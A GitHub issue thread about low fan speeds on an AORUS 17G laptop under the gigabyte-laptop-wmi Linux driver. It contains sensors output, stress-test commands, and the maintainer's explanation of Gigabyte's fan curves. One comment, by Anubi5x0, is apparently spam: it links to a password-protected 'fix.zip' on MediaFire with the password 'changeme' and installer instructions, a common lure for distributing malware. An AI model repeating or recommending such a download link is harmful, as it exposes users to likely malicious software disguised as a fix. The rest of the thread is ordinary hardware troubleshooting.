### ISSUE TITLE
Fan speed seems lower than expected on AORUS 17 laptop

### ISSUE THREAD

**Issue by morialo3** [tangalbert919/gigabyte-laptop-wmi#11]
First of all thank you very much for your work to support `gigabyte` laptops, as there are few projects that's trying to support some features [alfc](https://github.com/s-h-a-d-o-w/alfc) which support fans for gigabyte laptop, and also [opengigabyte](https://github.com/blmhemu/opengigabyte) for `Fn` keys and keyboard support, so thank you all.
I've been testing this module -thanks for the PKGBUILD, also it needs some fixing, I'll leave that to a later moment-  and everything is working as per wiki, but the fan speed it find it slower/less aggressive than what offered/noticed while using `alfc` while testing with `Gamemode` enabled and running `Elden Ring` through `Steam` my cpu reaches `90°c` at full fan speed compare to `alfc`, as my temps are around `80°c` at full fan speed, maybe this a hack from the `alfc` side, so a clarification about the fans speed is much needed in my case.
I'll attach some info about my laptop:
[AORUS 17G (RTX 30 Series)](https://www.gigabyte.com/Laptop/AORUS-17G--RTX-30-Series/)
also attached my dsdt.dat to this link : https://drive.google.com/file/d/1KALhrtNFyh_fVHTU5vhUZodr1lTdiI-j/view?usp=drive_link
Edit: `sensor` readings
```console
  ~                                                                                                                                                                                       at  19:04:23
❯ sensors     
iwlwifi_1-virtual-0
Adapter: Virtual device
temp1:        +50.0°C  

gigabyte_laptop-isa-0000
Adapter: ISA adapter
fan1:        3062 RPM
fan2:        3032 RPM
fan3:           0 RPM
fan4:           0 RPM
temp1:         +0.1°C  
temp2:         +0.0°C  
temp3:         +0.0°C  

BAT1-acpi-0
Adapter: ACPI interface
in0:          16.86 V  
curr1:         0.00 A  

coretemp-isa-0000
Adapter: ISA adapter
Package id 0:  +64.0°C  (high = +100.0°C, crit = +100.0°C)
Core 0:        +53.0°C  (high = +100.0°C, crit = +100.0°C)
Core 1:        +64.0°C  (high = +100.0°C, crit = +100.0°C)
Core 2:        +53.0°C  (high = +100.0°C, crit = +100.0°C)
Core 3:        +56.0°C  (high = +100.0°C, crit = +100.0°C)
Core 4:        +51.0°C  (high = +100.0°C, crit = +100.0°C)
Core 5:        +51.0°C  (high = +100.0°C, crit = +100.0°C)
Core 6:        +55.0°C  (high = +100.0°C, crit = +100.0°C)
Core 7:        +49.0°C  (high = +100.0°C, crit = +100.0°C)

pch_cometlake-virtual-0
Adapter: Virtual device
temp1:        +48.0°C  

nvme-pci-0500
Adapter: PCI adapter
Composite:    +24.9°C  (low  = -20.1°C, high = +74.8°C)
                       (crit = +79.8°C)

acpitz-acpi-0
Adapter: ACPI interface
temp1:        +27.8°C  
```

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tangalbert919** [comment]
The Google Drive link you have provided is requiring that I request access. However, it is not needed because I already have the DSDT for your AORUS model anyway.

The sensor readings provided do not indicate that they were taken while the computer was under maximum load. Can you try getting those readings again, but under maximum load and without using alfc? That way, I can determine if this is an issue with my kernel driver or not.

**Comment by morialo3** [comment]
> The Google Drive link you have provided is requiring that I request access.

Sorry about that, I didn't check of the link is accessible beforehand, apologies.
 > The sensor readings provided do not indicate that they were taken while the computer was under maximum load. Can you try getting those readings again, but under maximum load and without using alfc? 

Actually I stopped and disable `alfc` services before testing `gigabyte-laptop` maybe I should've mentioned that earlier.
I went and installed [stress](https://github.com/resurrecting-open-source-projects/stress) to stress the cpu, and also `unigine-heaven` to stress the `nvidia` gpu, separately of-course, these my highest readings I -manually- recorded.
## CPU
```console
stress --cpu 16 --io 16 --vm 8 --vm-bytes 1024M --timeout 90s
```
readings:
```console
❯ sensors
iwlwifi_1-virtual-0
Adapter: Virtual device
temp1:        +66.0°C  

pch_cometlake-virtual-0
Adapter: Virtual device
temp1:        +64.0°C  

BAT1-acpi-0
Adapter: ACPI interface
in0:          16.20 V  
curr1:         0.00 A  

gigabyte_laptop-isa-0000
Adapter: ISA adapter
fan1:        4138 RPM
fan2:        4076 RPM
fan3:           0 RPM
fan4:           0 RPM
temp1:         +0.1°C  
temp2:         +0.1°C  
temp3:         +0.0°C  

coretemp-isa-0000
Adapter: ISA adapter
Package id 0:  +89.0°C  (high = +100.0°C, crit = +100.0°C)
Core 0:        +80.0°C  (high = +100.0°C, crit = +100.0°C)
Core 1:        +86.0°C  (high = +100.0°C, crit = +100.0°C)
Core 2:        +87.0°C  (high = +100.0°C, crit = +100.0°C)
Core 3:        +90.0°C  (high = +100.0°C, crit = +100.0°C)
Core 4:        +90.0°C  (high = +100.0°C, crit = +100.0°C)
Core 5:        +86.0°C  (high = +100.0°C, crit = +100.0°C)
Core 6:        +87.0°C  (high = +100.0°C, crit = +100.0°C)
Core 7:        +87.0°C  (high = +100.0°C, crit = +100.0°C)

nvme-pci-0500
Adapter: PCI adapter
Composite:    +26.9°C  (low  = -20.1°C, high = +74.8°C)
                       (crit = +79.8°C)

acpitz-acpi-0
Adapter: ACPI interface
temp1:        +27.8°C 
```
## GPU

```console
unigine-heaven
```
readings:
```console
❯ sensors
coretemp-isa-0000
Adapter: ISA adapter
Package id 0:  +92.0°C  (high = +100.0°C, crit = +100.0°C)
Core 0:        +69.0°C  (high = +100.0°C, crit = +100.0°C)
Core 1:        +68.0°C  (high = +100.0°C, crit = +100.0°C)
Core 2:        +69.0°C  (high = +100.0°C, crit = +100.0°C)
Core 3:        +69.0°C  (high = +100.0°C, crit = +100.0°C)
Core 4:        +75.0°C  (high = +100.0°C, crit = +100.0°C)
Core 5:        +69.0°C  (high = +100.0°C, crit = +100.0°C)
Core 6:        +75.0°C  (high = +100.0°C, crit = +100.0°C)
Core 7:        +92.0°C  (high = +100.0°C, crit = +100.0°C)

gigabyte_laptop-isa-0000
Adapter: ISA adapter
fan1:        4122 RPM
fan2:        4060 RPM
fan3:           0 RPM
fan4:           0 RPM
temp1:         +0.1°C  
temp2:         +0.1°C  
temp3:         +0.0°C  

BAT1-acpi-0
Adapter: ACPI interface
in0:          16.21 V  
curr1:         0.00 A  

iwlwifi_1-virtual-0
Adapter: Virtual device
temp1:        +51.0°C  

pch_cometlake-virtual-0
Adapter: Virtual device
temp1:        +63.0°C  

nvme-pci-0500
Adapter: PCI adapter
Composite:    +27.9°C  (low  = -20.1°C, high = +74.8°C)
                       (crit = +79.8°C)

acpitz-acpi-0
Adapter: ACPI interface
temp1:        +27.8°C
```
this be no-means the best way to test and record results, so I apologize in advance.

**Comment by tangalbert919** [comment]
~4000 RPM. That seems too low to be the maximum speed for both fans.

Looks like the driver isn't reading thermals properly because they all report 0. I'll take a look into the DSDT for your model and see what I can do.

**Comment by morialo3** [comment]
> ~4000 RPM. That seems too low to be the maximum speed for both fans.
> 
> Looks like the driver isn't reading thermals properly because they all report 0. I'll take a look into the DSDT for your model and see what I can do.

Thank you for checking this issue.

**Comment by tangalbert919** [comment]
I just got an AORUS 15. The maximum RPM I got on this is around 5100 RPM, but Gigabyte seems to have made it so the fans don't reach that speed until the CPU is around 95℃. This only applies to their predefined fan curves, so customized fan curves are unaffected.

It looks like `alfc` is using its own fan curve to handle cooling, which means being on custom fan mode the whole time. Gigabyte's predefined fan curve for gaming mode isn't exactly aggressive (if you can call it that):

![image](https://github.com/user-attachments/assets/d5a8c72b-7d83-404b-ac75-ae0e9f4bba69)

**Comment by morialo3** [comment]
> I just got an AORUS 15. The maximum RPM I got on this is around 5100 RPM, but Gigabyte seems to have made it so the fans don't reach that speed until the CPU is around 95℃. This only applies to their predefined fan curves, so customized fan curves are unaffected.

I think I'll close this issue, and I'll stick to `Auto mode` for now, thanks again for you help!
